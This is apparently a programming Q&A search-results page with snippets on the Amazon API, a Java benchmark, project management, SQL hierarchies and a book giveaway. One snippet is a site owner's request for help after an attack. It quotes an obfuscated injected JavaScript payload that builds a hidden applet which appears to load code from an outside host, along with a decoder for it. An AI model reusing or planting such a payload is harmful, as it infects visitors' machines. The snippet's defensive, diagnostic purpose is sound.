Search Results

Search found 708 results on 29 pages for 'steven potter'.

Page 27/29 | < Previous Page | 23 24 25 26 27 28 29  | Next Page >

  • Amazon API ItemSearch returns (400) Bad Request.

    - by BuzzBubba
    I'm using a simple example from Amazon documentation for ItemSearch and I get a strange error: "The remote server returned an unexpected response: (400) Bad Request." This is the code: public static void Main() { //Remember to create an instance of the amazon service, including you Access ID. AWSECommerceServicePortTypeClient service = new AWSECommerceServicePortTypeClient(new BasicHttpBinding(), new EndpointAddress( "http://webservices.amazon.com/onca/soap?Service=AWSECommerceService")); AWSECommerceServicePortTypeClient client = new AWSECommerceServicePortTypeClient( new BasicHttpBinding(), new EndpointAddress("http://webservices.amazon.com/onca/soap?Service=AWSECommerceService")); // prepare an ItemSearch request ItemSearchRequest request = new ItemSearchRequest(); request.SearchIndex = "Books"; request.Title = "Harry+Potter"; request.ResponseGroup = new string[] { "Small" }; ItemSearch itemSearch = new ItemSearch(); itemSearch.Request = new ItemSearchRequest[] { request }; itemSearch.AWSAccessKeyId = accessKeyId; // issue the ItemSearch request try { ItemSearchResponse response = client.ItemSearch(itemSearch); // write out the results foreach (var item in response.Items[0].Item) { Console.WriteLine(item.ItemAttributes.Title); } } catch(Exception e) { Console.ForegroundColor = ConsoleColor.Red; Console.WriteLine(e.Message); Console.ForegroundColor = ConsoleColor.White; Console.WriteLine("Press any key to quit..."); Clipboard.SetText(e.Message); } Console.ReadKey(); What is wrong?
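    A couple of details are commonly behind this particular error, though without seeing the AWS account setup this is only a guess. The plain "unexpected response: (400) Bad Request" message is a ProtocolException, which means the service rejected the request before returning a SOAP fault. The SOAP payload carries literal text, so the title should be "Harry Potter" rather than the URL-encoded "Harry+Potter", and depending on the Product Advertising API version in use, unsigned requests and requests without an AssociateTag are also rejected. A sketch of the first things to try (the AssociateTag value is a placeholder, and whether signing is required depends on the API version):

        // Sketch only: verify against the Product Advertising API version you are calling.
        ItemSearchRequest request = new ItemSearchRequest();
        request.SearchIndex = "Books";
        request.Title = "Harry Potter";                   // no '+' encoding inside a SOAP body
        request.ResponseGroup = new string[] { "Small" };

        ItemSearch itemSearch = new ItemSearch();
        itemSearch.Request = new ItemSearchRequest[] { request };
        itemSearch.AWSAccessKeyId = accessKeyId;
        // itemSearch.AssociateTag = "mytag-20";          // hypothetical value; later API versions reject requests without one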

    Read the article

  • Malware Cross Site Scripting attack / XSS Attack?

    - by user124176
    I have been hit by a Cross Site Scripting / XSS / RFI attack, but I can't find it anywhere in the source of the files, and the hashes on the files have not changed according to the OSSEC HIDS that runs real-time monitoring on all web directories. The attack happens on IE9 only, and it appends JavaScript code like the sample beneath; notice that it starts after the /html tag closes normally: scXXpt language="javascXXpt"var enuwjo = function(gqumas, yhxxju, zbkpilf, xzzvhld){var xew = function(iso) {var crh, eaq, i; var owb=""; crh = iso.length; for (i = 0; i < crh; ++i) {eaq = iso.charCodeAt(i)-2;owb = owb + String.fromCharCode(eaq);} return(owb); } var janlq=document.createElement(xew("crrngv"));janlq.setAttribute(xew("eqfg"), xew(gqumas));janlq.setAttribute(xew("ctejkxg"), xew("jvvr<11"+yhxxju));janlq.setAttribute(xew("ykfvj"), "1");janlq.setAttribute(xew("jgkijv"), "1");var lgtwyi=document.createElement(xew("rctco"));lgtwyi.setAttribute(xew("pcog"),xew(zbkpilf));lgtwyi.setAttribute(xew("xcnwg"),xew(xzzvhld));janlq.appendChild(lgtwyi);document.body.appendChild(janlq); } ; enuwjo("vxfgwtogg0dcrcmnwe0encuu","g{g0o{yge{0kp129;5","mlit{ttmdttponfhrrexihpe","fh;ccfe:85:5d9872;2;f569276h5268ff9;34:25;7d:8:7h8c68777;;822c73"); No code has been changed on disk as far as my HIDS can tell, but I can see the following in my error log: File does not exist: /var/www/vhosts/superkids.dk/ggtest/tvdeurmee And in the access log: IP - - [09/Jun/2012:23:30:13 +0200] "GET /tvdeurmee/bapakluc.class HTTP/1.1" 404 504 "-" "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_04" IP - - [09/Jun/2012:23:30:13 +0200] "GET /tvdeurmee/bapakluc/class.class HTTP/1.1" 404 509 "-" "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_04" Now, the folder or path /tvdeurmee/bapakluc/ does not exist on the server in question, nor does the Java class class.class, yet it still looks like a local call to the server, and it was getting a "404 File not found / 504 Gateway Timeout" (the attack was blocked by the local machine, hence the timeout / not found). Any idea on how to prevent the attack? I'm working on using HTML Purifier, but that might not be the correct approach, according to some replies I'm getting on their forum :) Kind regards, Steven
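    For what it is worth, the obfuscation in that snippet is only a character-code shift: the xew() helper subtracts 2 from every character code. Decoding the string literals shows the script builds a 1x1 applet element whose code attribute decodes to "tvdeurmee.bapakluc.class" and whose archive attribute appears to point at an external host, which matches the requests for non-existent .class files in the access log (the Java plug-in translating the dotted class name into paths). A small decoder sketch, written in C# purely for illustration:

        using System;
        using System.Linq;

        class ShiftDecoder
        {
            // Mirrors the xew() helper in the injected script: shift every character code down by 2.
            static string Decode(string s)
            {
                return new string(s.Select(c => (char)(c - 2)).ToArray());
            }

            static void Main()
            {
                Console.WriteLine(Decode("crrngv"));                   // applet
                Console.WriteLine(Decode("eqfg"));                     // code
                Console.WriteLine(Decode("ctejkxg"));                  // archive
                Console.WriteLine(Decode("jvvr<11"));                  // http://
                Console.WriteLine(Decode("vxfgwtogg0dcrcmnwe0encuu")); // tvdeurmee.bapakluc.class
            }
        }

    Since the payload is appended after the closing /html tag while the files on disk are unchanged, it is worth checking whether the injection happens in transit (a compromised include or module on the web server, or malware on the client viewing the page) rather than in application code that HTML Purifier would cover.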

    Read the article

  • Null-free "maps": Is a callback solution slower than tryGet()?

    - by David Moles
    In comments to "How to implement List, Set, and Map in null free design?", Steven Sudit and I got into a discussion about using a callback, with handlers for "found" and "not found" situations, vs. a tryGet() method, taking an out parameter and returning a boolean indicating whether the out parameter had been populated. Steven maintained that the callback approach was more complex and almost certain to be slower; I maintained that the complexity was no greater and the performance at worst the same. But code speaks louder than words, so I thought I'd implement both and see what I got. The original question was fairly theoretical with regard to language ("And for argument sake, let's say this language don't even have null") -- I've used Java here because that's what I've got handy. Java doesn't have out parameters, but it doesn't have first-class functions either, so style-wise, it should suck equally for both approaches. (Digression: As far as complexity goes: I like the callback design because it inherently forces the user of the API to handle both cases, whereas the tryGet() design requires callers to perform their own boilerplate conditional check, which they could forget or get wrong. But having now implemented both, I can see why the tryGet() design looks simpler, at least in the short term.) First, the callback example: class CallbackMap<K, V> { private final Map<K, V> backingMap; public CallbackMap(Map<K, V> backingMap) { this.backingMap = backingMap; } void lookup(K key, Callback<K, V> handler) { V val = backingMap.get(key); if (val == null) { handler.handleMissing(key); } else { handler.handleFound(key, val); } } } interface Callback<K, V> { void handleFound(K key, V value); void handleMissing(K key); } class CallbackExample { private final Map<String, String> map; private final List<String> found; private final List<String> missing; private Callback<String, String> handler; public CallbackExample(Map<String, String> map) { this.map = map; found = new ArrayList<String>(map.size()); missing = new ArrayList<String>(map.size()); handler = new Callback<String, String>() { public void handleFound(String key, String value) { found.add(key + ": " + value); } public void handleMissing(String key) { missing.add(key); } }; } void test() { CallbackMap<String, String> cbMap = new CallbackMap<String, String>(map); for (int i = 0, count = map.size(); i < count; i++) { String key = "key" + i; cbMap.lookup(key, handler); } System.out.println(found.size() + " found"); System.out.println(missing.size() + " missing"); } } Now, the tryGet() example -- as best I understand the pattern (and I might well be wrong): class TryGetMap<K, V> { private final Map<K, V> backingMap; public TryGetMap(Map<K, V> backingMap) { this.backingMap = backingMap; } boolean tryGet(K key, OutParameter<V> valueParam) { V val = backingMap.get(key); if (val == null) { return false; } valueParam.value = val; return true; } } class OutParameter<V> { V value; } class TryGetExample { private final Map<String, String> map; private final List<String> found; private final List<String> missing; public TryGetExample(Map<String, String> map) { this.map = map; found = new ArrayList<String>(map.size()); missing = new ArrayList<String>(map.size()); } void test() { TryGetMap<String, String> tgMap = new TryGetMap<String, String>(map); for (int i = 0, count = map.size(); i < count; i++) { String key = "key" + i; OutParameter<String> out = new OutParameter<String>(); if (tgMap.tryGet(key, out)) { found.add(key + ": " + out.value); } else { 
missing.add(key); } } System.out.println(found.size() + " found"); System.out.println(missing.size() + " missing"); } } And finally, the performance test code: public static void main(String[] args) { int size = 200000; Map<String, String> map = new HashMap<String, String>(); for (int i = 0; i < size; i++) { String val = (i % 5 == 0) ? null : "value" + i; map.put("key" + i, val); } long totalCallback = 0; long totalTryGet = 0; int iterations = 20; for (int i = 0; i < iterations; i++) { { TryGetExample tryGet = new TryGetExample(map); long tryGetStart = System.currentTimeMillis(); tryGet.test(); totalTryGet += (System.currentTimeMillis() - tryGetStart); } System.gc(); { CallbackExample callback = new CallbackExample(map); long callbackStart = System.currentTimeMillis(); callback.test(); totalCallback += (System.currentTimeMillis() - callbackStart); } System.gc(); } System.out.println("Avg. callback: " + (totalCallback / iterations)); System.out.println("Avg. tryGet(): " + (totalTryGet / iterations)); } On my first attempt, I got 50% worse performance for callback than for tryGet(), which really surprised me. But, on a hunch, I added some garbage collection, and the performance penalty vanished. This fits with my instinct, which is that we're basically talking about taking the same number of method calls, conditional checks, etc. and rearranging them. But then, I wrote the code, so I might well have written a suboptimal or subconsicously penalized tryGet() implementation. Thoughts?
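    As an aside that is not part of the original benchmark: in a language that does have out parameters, the tryGet() shape is the familiar TryGetValue idiom, which makes the "caller must remember the conditional" objection easy to see. A minimal C# sketch for comparison:

        using System;
        using System.Collections.Generic;

        class TryGetDemo
        {
            static void Main()
            {
                var map = new Dictionary<string, string> { { "key1", "value1" } };

                string value;
                if (map.TryGetValue("key1", out value))
                    Console.WriteLine("key1: " + value);  // "found" branch
                else
                    Console.WriteLine("key1 missing");    // nothing forces the caller to write this branch
            }
        }

    The callback design in the Java code above makes both branches mandatory at compile time, which is exactly the complexity/safety trade-off being argued. On the measurement itself, millisecond timestamps plus no JIT warm-up make Java micro-benchmarks quite noisy, which may explain why the 50% swing disappeared once the System.gc() calls were added.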

    Read the article

  • Death March

    - by Nick Harrison
    It is a horrible sight to watch a project fail. There are few things as bad. Watching a project fail, regardless of the reason, is almost like sitting in a room with a "Dementor" from Harry Potter. It will suck all of the life and joy out of the room. Nearly every project that I have seen fail has failed because of political challenges or management challenges. Sometimes there are technical challenges that bring a project to its knees, but usually projects fail for less technical reasons. Here are a few observations about projects failing for political reasons. Both the client and the consultants have to be committed to seeing the project succeed. Put simply, you cannot solve a problem when the primary stakeholders do not truly want it solved. This could come from a consultant being more interested in extending the engagement. It could come from a client being afraid of what will happen to them once the problem is solved. It could come from disenfranchised stakeholders. Sometimes a project is beset on all sides. When you find yourself working on a project that has this kind of threat, do all that you can to constrain the disruptive influences of the bad apples. If their influence cannot be constrained, you truly have no choice but to move on to a new project. Tough choices have to be made to make a project successful. These choices will affect everyone involved in the project. These choices may involve users not getting a change request through that they want. Developers may not get to use the tools that they want. Everyone may have to put in more hours than they originally planned. Steps may be skipped. Compromises will be made, but if everyone stays committed to the end goal, you can still be successful. If individuals start feeling disgruntled or resentful of the compromises reached, the project can easily be derailed. When everyone is not working towards a common goal, it is like driving with one foot on the brake and one foot on the accelerator. Not only will you not get to where you are planning, you will also damage the car and possibly the passengers as well. It is important to always keep the end result in mind. Regardless of the development methodology being followed, the end goal is not comprehensive documentation. In all cases, it is working software. Comprehensive documentation is nice but useless if the software doesn't work. You can never get so distracted by the next goal that you fail to meet the current goal. Most projects are ultimately marathons. This means that the pace must be sustainable. Regardless of the temptations, you cannot burn the team alive. Processes will fail. Technology will get outdated. Requirements will change, but your people will adapt and learn and grow. If everyone on the team from the most senior analyst to the most junior recruit trusts and respects each other, there is no challenge that they cannot overcome. When everyone involved faces challenges with the attitude "This is my project and I will not let it fail" and "You are my teammate and I will not let you fail", you will in fact not fail. When you find a team that embraces this attitude, protect it at all costs. Edward Yourdon wrote a book called Death March. In it, he included a graph for categorizing Death March project types based on the Happiness of the Team and the Chances of Success. Chances are we have all worked on Death March projects. We will all most likely work on more Death March projects in the future.
To a certain extent, they seem to be inevitable, but they should never be "suicide" or "ugly" projects. Ideally, they can all be "Mission Impossible", where everyone works hard, has fun, and knows that there is a good chance that they will succeed. If you are ever lucky enough to work on such a project, you will know that sense of pride that comes from the eventual success. You will recognize a profound bond with the team that you worked with. Chances are it will change your life, or at least your outlook on life. If you have not already read this book, get a copy and study it closely. It will help you survive and make the most out of your next Death March project.

    Read the article

  • Challenge 19 – An Explanation of a Query

    - by Dave Ballantyne
    I have received a number of requests for an explanation of my winning query for TSQL Challenge 19. This involved traversing a hierarchy of employees and rolling a count of orders from subordinates up to superiors. The first concept I shall address is the hierarchyId, which is constructed within the CTE called cteTree. cteTree is a recursive CTE that will expand the parent-child hierarchy of the personnel in the table @emp. One useful feature of a recursive CTE is that data can be ‘passed’ from the parent rows to the child rows. The hierarchyId column is similar to the hierarchyId data type that was introduced in SQL Server 2008 and represents the position of the person within the organisation. Let us start with a simplistic example: Albert manages Bob and Eddie, and Bob manages Carl and Dave. The hierarchyId will represent each person’s position in this relationship in a single field. In this simple example we could append the user IDs together into a varchar field as detailed below. This will enable us to select a branch of the tree by filtering using WHERE hierarchyId LIKE ‘1,2%’ to select Bob and all his subordinates. Naturally, this is not comprehensive enough to provide a full solution, but as opposed to concatenating the IDs together into a varchar-typed column, we can apply the same theory to a varbinary. We do this by CASTing the IDs to varbinary(4) (4 bytes being what is needed to store an integer) and building a hierarchyId from those. The important point to bear in mind for later in the query is that the binary data generated is 'byte order comparable', i.e. we can ORDER a dataset with it and the resulting data will be in the order required. Now would probably be a good time to download the example file and, after the CTE ‘cteTree’, uncomment the line ‘select * from cteTree’. Mark this and all prior code and execute. This will show you how this theory directly relates to the actual challenge data. The only deviation from the above is that instead of using the ID of an employee, I have used the row_number() ranking function to order each level by LastName, FirstName. This enables me to order by the hierarchyId in the final result set so that the result set is in the required order. Your output should be something like the below. Notice also the ‘Level’ column that contains the depth of the employee within the tree. I would encourage you to ‘play’ with the query: change the order in the row_number() or the length of the cast in the hierarchyId to see how that affects the outcome. The next CTE, ‘cteTreeWithOrderCount’, is a join between cteTree and the @ord table, and COUNTs the number of orders per employee. A LEFT JOIN is employed here to account for the occasion where an employee has made no sales. Executing a ‘Select * from cteTreeWithOrderCount’ will return the result set as below. The order here is unimportant as this is only a staging point of the data, and only the final result set in a CTE chain needs an ORDER BY clause, unless TOP is utilised. cteExplode joins the above result set to the tally table (Nums) for Level occurrences. So, if Level is 2 then 2 rows are required. This is done to expand the dataset, creating a new column (PathInc) which is the (n+1) integers contained within the hierarchyId. For example, with the data for Robert King as given above, the below 3 rows will be returned.
From this you can see that the PathInc column now contains the values for Andrew Fuller and Steven Buchanan, who are Robert King’s superiors within the tree. Finally, cteSumUp sums the orders for each person and their subordinates using the PathInc generated above, and the final SELECT does the final simple mathematics and filters to restrict the result set to only the ‘original’ row per employee.
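    To see why the fixed-width binary keys are 'byte order comparable', here is a small illustrative sketch (C# rather than T-SQL, and the names come from the simplified Albert/Bob example above): each ID is appended as 4 big-endian bytes, so comparing the concatenated keys byte by byte reproduces the tree order, with parents sorting before their children.

        using System;
        using System.Collections.Generic;
        using System.Linq;

        class HierarchyKeyDemo
        {
            // Append an int as 4 big-endian bytes, mirroring CAST(id AS varbinary(4)).
            static byte[] Append(byte[] parentKey, int id)
            {
                byte[] part = BitConverter.GetBytes(id);
                if (BitConverter.IsLittleEndian) Array.Reverse(part);
                return parentKey.Concat(part).ToArray();
            }

            // Fixed-width hex, so ordinal string comparison matches byte-order comparison.
            static string Hex(byte[] key) { return BitConverter.ToString(key); }

            static void Main()
            {
                byte[] albert = Append(new byte[0], 1);
                byte[] bob    = Append(albert, 2);
                byte[] carl   = Append(bob, 3);
                byte[] eddie  = Append(albert, 5);

                var keys = new List<byte[]> { eddie, carl, albert, bob };
                foreach (var key in keys.OrderBy(Hex, StringComparer.Ordinal))
                    Console.WriteLine(Hex(key));
                // Prints Albert, Bob, Carl, Eddie: ordering by the binary key walks the tree depth-first.
            }
        }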

    Read the article

  • Regular Expressions Cookbook Is in The Money—Win a Copy

    - by Jan Goyvaerts
    You may have heard some people say that most book authors never get any royalties. That’s not true because most authors get an advance royalty that is paid before the book is published. That’s the author’s main incentive for writing the book, at least as far as money is concerned. (If money is your main concern, don’t write books.) What is true is that most authors never see any money beyond the advance royalty. Royalty rates are very low. A 10% royalty of the publisher’s price is considered normal. The publisher’s price is usually 45% of the retail price. So if you pay full price in a bookstore, the author gets 4.5% of your money. If there’s more than one author, they split the royalty. It doesn’t take a math degree to figure out that a book needs to sell quite a few copies for the royalty to add up to a meaningful amount of money. But Steven and I must have done something right. Regular Expressions Cookbook is in the money. My royalty statement for the 3rd quarter of 2009, which is the 2nd quarter that the book was on the market, came with a check. I actually received it last month but didn’t get around to blogging about it. The amount of the check is insignificant. The point is that the balance is no longer negative. I’m taking this opportunity to pat myself and my co-author on the back. To celebrate the occasion, O’Reilly has offered to sponsor a give-away of five (5) copies of Regular Expressions Cookbook. These are the rules of the game: You must post a comment to this blog article including your actual name and actual email address. Names are published, email addresses are not. Comments are moderated by myself (Jan Goyvaerts). If I consider a comment to be offensive or spam it will not be published and not be eligible for any prize. If you don’t know what to say in the comment, just wish me a happy 100000nd birthday, so I don’t have to feel so bad about entering the 6-bit era. Each person commenting has only one chance to win, regardless of the number of comments posted. O’Reilly will be provided with the names and email addresses of the winners (and those email addresses only) in order to arrange delivery. Each winner can choose to receive a printed copy or ebook (DRM-free PDF). If you choose the printed book, O’Reilly pays for shipping to anywhere in the world but not for any duties or taxes your country may impose on books imported from the USA. If you choose the ebook, you’ll need to create an O’Reilly account that is then granted access to the PDF download. You can make your choice after you’ve won, so it doesn’t influence your chance of winning. Contest ends 28 February 2010, GMT+7 (Thai time). Chosen by five calls to Random(78)+1 in Delphi 2010, the winners are: 48: Xiaozu 45: David Chisholm 19: Miquel Burns 33: Aaron Rice 17: David Laing Thanks to everybody who participated. The winners have been notified by email on how to collect their prize.

    Read the article

  • #MIX Day 2 Keynote: Put the Phone Down and Listen

    - by andrewbrust
    MIX day 1’s keynote was all about Windows Phone 7 (WP7).  MIX day 2’s was a reminder that Microsoft has much more going on than a new mobile platform.  Steven Sinofsky, Scott Guthrie, Doug Purdy and others showed us lots of other good things coming from Microsoft, mostly in the developer stack, that we certainly shouldn’t overlook.  These included the forthcoming IE9, its new JavaScript compiling engine and support for HTML 5 that takes full advantage of the local PC resources, including the Graphics Processing Unit.  The announcements also included important additions to ASP.NET (and one subtraction, in the form of lighter-weight ViewState technology) including almost-obsessive jQuery support.  That support is so good that John Resig, creator of the jQuery project, came on stage to tell us so.  Then Scott Guthrie told us that Microsoft would be contributing code to Open Source jQuery project. This is not your father’s Microsoft, it would seem. But to me, the crown jewel in today’s keynote were the numerous announcements around the Open Data Protocol (OData).  OData is nothing more than the protocol side of “Astoria” (now known as WCF Data Services, and until recently called ADO.NET Data Services) separated out and opened up as a platform-neutral standard.  The 2009 Professional Developers Conference (PDC) was Microsoft’s vehicle for first announcing OData, as well as project “Dallas,” an Azure-based cloud platform for publishing commercial OData feeds.  And we had already known about “bridges” for Astoria (and thus OData) for PHP and Java.  We also knew that PowerPivot, Microsoft’s forthcoming self-service BI plug-in for Excel 2010, will consume OData feeds and then facilitate drill-down analysis of their data.  And we recently found out that SQL Reporting Services reports (in the forthcoming SQL Server 2008 R2) and SharePoint 2010 lists will be consumable in OData format as well. So what was left to announce?  How about OData clients for Palm webOS and Apple iPhone/Objective C?  How about the release to Open Source of .NET’s OData client?  Or the ability to publish any SQL Azure database as an OData service by simply checking a checkbox at deployment?  Maybe even a Silverlight tool (code-named “Houston”) to create SQL Azure databases (and then publish them as OData) right in the browser?  And what if you you could get at NetFlix’s entire catalog in OData format?  You can – just go to http://odata.netflix.com/Catalog/ and see for yourself.  Douglas Purdy, who made these announcements said “we want OData to work on as many devices and platforms as possible.”  After all the cross-platform OData announcements made in about a half year’s time, it’s hard to dispute this. When Microsoft plays the data card, and plays it well, watch out, because data programmability is the company’s heritage.  I’ll be discussing OData at length in my April Redmond Review column.  I wrote that column two weeks ago, and was convinced then that OData was a big deal. Today upped the ante even more.  And following the Windows Phone 7 euphoria of yesterday was, I think, smart timing.  The phone, if it’s successful, will be because it’s a good developer platform play.  And developer platforms (as well as their creators) are most successful when they have a good data strategy.  OData is very Silverlight-friendly, and that means it’s WP7-friendly too.  Phone plus service-oriented data is a one-two punch.  A phone platform without data would have been a phone with no signal.

    Read the article

  • ArchBeat Link-o-Rama Top 10 for December 9-15, 2012

    - by Bob Rhubart
    You click, we listen. The following list reflects the Top 10 most popular items posted on the OTN ArchBeat Facefbook page for the week of December 9-15, 2012. DevOps Basics II: What is Listening on Open Ports and Files – WebLogic Essentials | Dr. Frank Munz "Can you easily find out which WebLogic servers are listening to which port numbers and addresses?" asks Dr. Frank Munz. The good doctor has an answer—and a tech tip. Using OBIEE against Transactional Schemas Part 4: Complex Dimensions | Stewart Bryson "Another important entity for reporting in the Customer Tracking application is the Contact entity," says Stewart Bryson. "At first glance, it might seem that we should simply build another dimension called Dim – Contact, and use analyses to combine our Customer and Contact dimensions along with our Activity fact table to analyze Customer and Contact behavior." SOA 11g Technology Adapters – ECID Propagation | Greg Mally "Many SOA Suite 11g deployments include the use of the technology adapters for various activities including integration with FTP, database, and files to name a few," says Oracle Fusion Middleware A-Team member Greg Mally. "Although the integrations with these adapters are easy and feature rich, there can be some challenges from the operations perspective." Greg's post focuses on technical tips for dealing with one of these challenges. Podcast: DevOps and Continuous Integration In Part 1 of a 3-part program, panelists Tim Hall (Senior Director of product management for Oracle Enterprise Repository and Oracle’s Application Integration Architecture), Robert Wunderlich (Principal Product Manager for Oracle’s Application Integration Architecture Foundation Pack) and Peter Belknap (Director of product management for Oracle SOA Integration) discuss why DevOps matters and how it changes development methodologies and organizational structure. Good To Know - Conflicting View Objects and Shared Entity | Andrejus Baranovskis Oracle ACE Director Andrejus Baranovskis shares his thoughts -- and a sample application -- dealing with an "interesting ADF behavior" encountered over the weekend. Cloud Deployment Models | B. R. Clouse Looking out for the cloud newbies... "As the cloud paradigm grows in depth and breadth, more readers are approaching the topic for the first time, or from a new perspective," says B. R. Clouse. "This blog is a basic review of cloud deployment models, to help orient newcomers and neophytes." Service governance morphs into cloud API management | David Linthicum "When building and using clouds, the ability to manage APIs or services is the single most important item you can provide to ensure the success of the project," says David Linthicum. "But most organizations driving a cloud project for the first time have no experience handling a service-based architecture and don't see the need for API management until after deployment. By then, it's too late." Oracle Fusion Middleware Security: Password Policy in OAM 11g R2 | Rob Otto Rob Otto continues the Oracle Fusion Middleware A-Team "Oracle Access Manager Academy" series with a detailed look at OAM's ability to support "a subset of password management processes without the need to use Oracle Identity Manager and LDAP Sync." Understanding the JSF Lifecycle and ADF Optimized Lifecycle | Steven Davelaar Could you call that a surprise ending? 
Oracle WebCenter & ADF Architecture Team (A-Team) member learned a lot more than he expected while creating a UKOUG presentation entitled "What you need to know about JSF to be succesful with ADF." Expanding on requestaudit - Tracing who is doing what...and for how long | Kyle Hatlestad "One of the most helpful tracing sections in WebCenter Content (and one that is on by default) is the requestaudit tracing," says Oracle Fusion Middleware A-Team architect Kyle Hatlestad. Get up close and technical in his post. Thought for the Day "There is no code so big, twisted, or complex that maintenance can't make it worse." — Gerald Weinberg Source: SoftwareQuotes.com

    Read the article

  • Additional new material WebLogic Community

    - by JuergenKress
    Virtual Developer Conference On Demand - Register Updated Book: WebLogic 12c: Distinctive Recipes - Architecture, Development, Administration by Oracle ACE Director Frank Munz - Blog | YouTube Webcast: Migrating from GlassFish to WebLogic - Replay Reliance Commercial Finance Accelerates Time-to-Market, Improves IT Staff Productivity by 70% - Blog | Oracle Magazine Retrieving WebLogic Server Name and Port in ADF Application by Andrejus Baranovskis, Oracle Ace Director - Blog Using Oracle WebLogic 12c with NetBeans IDEOracle ACE Director Markus Eisele walks you through installing and configuring all the necessary components, and helps you get started with a simple Hello World project. Read the article. Video: Oracle A-Team ADF Mobile Persistence SampleThis video by Oracle Fusion Middleware A-Team architect Steven Davelaar demonstrates how to use the ADF Mobile Persistence Sample JDeveloper extension to generate a fully functional ADF Mobile application that reads and writes data using an ADF BC SOAP web service. Watch the video. Java ME 8 ReleaseDownload Java ME today! This release is an implementation of the Java ME 8 standards JSR 360 (CLDC 8) and JSR 361 (MEEP 8), and includes support of alignment with Java SE 8 language features and APIs, an enhanced services-enabled application platform, the ability to "right-size" the platform to address a wide range of target devices, and more. Learn more Download Java ME SDK 8It includes application development support for Oracle Java ME Embedded 8 platforms and includes plugins for NetBeans 8. See the Java ME 8 Developer Tools Documentation to learn JavaOne 2014 Early Bird RateRegister early to save $400 off the onsite price. With the release of Java 8 this year, we have exciting new sessions and an interactive demo space! NetBeans IDE 8.0 Patch UpdateThe NetBeans Team has released a patch for NetBeans IDE 8.0. Download it today to get fixes that enhance stability and performance. Java 8 Questions ForumFor any questions about this new release, please join the conversation on the Java 8 Questions Forum. Java ME 8: Getting Started with Samples and Demo CodeLearn in few steps how to get started with Java ME 8! The New Java SE 8 FeaturesJava SE 8 introduces enhancements such as lambda expressions that enable you to write more concise yet readable code, better utilize multicore systems, and detect more errors at compile time. See What's New in JDK 8 and the new Java SE 8 documentation portal. Pay Less for Java-Related Books!Save 20% on all new Oracle Press books related to Java. Download the free preview sampler for the Java 8 book written by Herbert Schildt, Maurice Naftain, Henrik Ebbers and J.F. DiMarzio. New book: EJB 3 in Action, Second Edition WebLogic 12c Does WebSockets Getting Started by C2B2 Video: Building Robots with Java Embedded Video: Nighthacking TV Watch presentations by Stephen Chin and community members about Java SE, Java Embedded, Java EE, Hadoop, Robots and more. Migrating the Spring Pet Clinic to Java EE 7 Trip report : Jozi JUG Java Day in Johannesburg How to Build GlassFish 4 from Source 4,000 posts later : The Aquarium WebLogic Partner Community For regular information become a member in the WebLogic Partner Community please visit: http://www.oracle.com/partners/goto/wls-emea ( OPN account required). If you need support with your account please contact the Oracle Partner Business Center. Blog Twitter LinkedIn Mix Forum Wiki Technorati Tags: WebLogic,WebLogic Community,Oracle,OPN,Jürgen Kress

    Read the article

  • Class design issue

    - by user2865206
    I'm new to OOP and a lot of times I become stumped in situations similar to this example: Task: Generate an XML document that contains information about a person. Assume the information is readily available in a database. Here is an example of the structure: <Person> <Name>John Doe</Name> <Age>21</Age> <Address> <Street>100 Main St.</Street> <City>Sylvania</City> <State>OH</State> </Address> <Relatives> <Parents> <Mother> <Name>Jane Doe</Name> </Mother> <Father> <Name>John Doe Sr.</Name> </Father> </Parents> <Siblings> <Brother> <Name>Jeff Doe</Name> </Brother> <Brother> <Name>Steven Doe</Name> </Brother> </Siblings> </Relatives> </Person> OK, let's create a class for each tag (i.e. Person, Name, Age, Address). Let's assume each class is only responsible for itself and the elements directly contained. Each class will know (have defined by default) the classes that are directly contained within it. Each class will have a process() function that will add itself and its children to the XML document we are creating. When a child is drawn, as in the previous line, we will have it call process() as well. Now we are in a recursive loop where each object draws its children until all are drawn. But what if only some of the tags need to be drawn, and the rest are optional? Some are optional based on whether the data exists (if we have it, we must draw it), and some are optional based on the preferences of the user generating the document. How do we make sure each object has the data it needs to draw itself and its children? We can pass down a massive array through every object, but that seems shitty, doesn't it? We could have each object query the database for it, but that's a lot of queries, and how does it know what its query is? What if we want to get rid of a tag later? There is no way to reference them. I've been thinking about this for 20 hours now. I feel like I am misunderstanding a design principle or am just approaching this all wrong. How would you go about programming something like this? I suppose this problem could apply to any scenario where there are classes that create other classes, but the classes created need information to run. How do I get the information to them in a way that doesn't seem fucky? Thanks for all of your time, this has been kicking my ass.
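    One way to avoid both the "massive array" and per-object database queries is to load the data once into a plain object and pass that object (plus a small options object for user preferences) down the same recursive process() chain; each section then decides locally whether it has anything to emit. A rough C# sketch, where all of the type names are hypothetical and not from the original post:

        using System.Xml.Linq;

        class PersonData { public string Name; public int? Age; /* address, relatives, ... */ }
        class RenderOptions { public bool IncludeRelatives; }

        interface IXmlSection
        {
            void Process(XElement parent, PersonData data, RenderOptions options);
        }

        class AgeSection : IXmlSection
        {
            public void Process(XElement parent, PersonData data, RenderOptions options)
            {
                if (data.Age.HasValue)                        // "optional if the data is missing" lives here
                    parent.Add(new XElement("Age", data.Age.Value));
            }
        }

        class PersonSection : IXmlSection
        {
            // Children known by default, as in the original design.
            private readonly IXmlSection[] children = { new AgeSection() /*, name, address, relatives... */ };

            public void Process(XElement parent, PersonData data, RenderOptions options)
            {
                var person = new XElement("Person");
                foreach (var child in children)
                    child.Process(person, data, options);     // two small objects flow down, not a giant array
                parent.Add(person);
            }
        }

    Building on XElement also means elements can be found and removed later by name, which speaks to the "no way to reference them" worry.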

    Read the article

  • Mocking HttpContext in .NET MVC2 using Moq

    - by Richard
